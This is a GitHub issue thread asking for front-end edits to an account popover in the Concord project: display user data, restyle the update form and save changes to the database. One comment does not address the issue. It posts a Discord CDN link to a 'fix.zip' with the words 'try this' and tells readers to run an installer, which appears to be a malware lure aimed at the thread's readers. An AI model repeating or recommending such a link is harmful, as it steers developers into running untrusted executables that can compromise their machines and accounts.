### ISSUE TITLE
[Improvement] [FE] Account Popover Edits

### ISSUE THREAD

**Issue by jessieh9** [spatialneuroscience/Concord#44]
Currently, our account popover looks like this:
![Image](https://github.com/user-attachments/assets/3cdd012f-73a6-4d1e-9162-309102ab30c1)

1. Grab user data from database to display. Weekly hours can be hardcoded still since we haven't implemented the feature yet.
2. Edit the account information update form to reflect these changes. The functionality for an uneditable email is great, you can keep that! Just change the placeholder boxes and color of the titles.
![Image](https://github.com/user-attachments/assets/68e6632b-a7b4-47a1-818d-9c3bfef73f05)

3. When saving changes, connect to the database and update the user information such that it displays on our account popover.

Figma Link: https://www.figma.com/team_invite/redeem/m7USct7pyXUSdm1R6BbS9B

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by stevenguyukai** [comment]
See Pull request #40
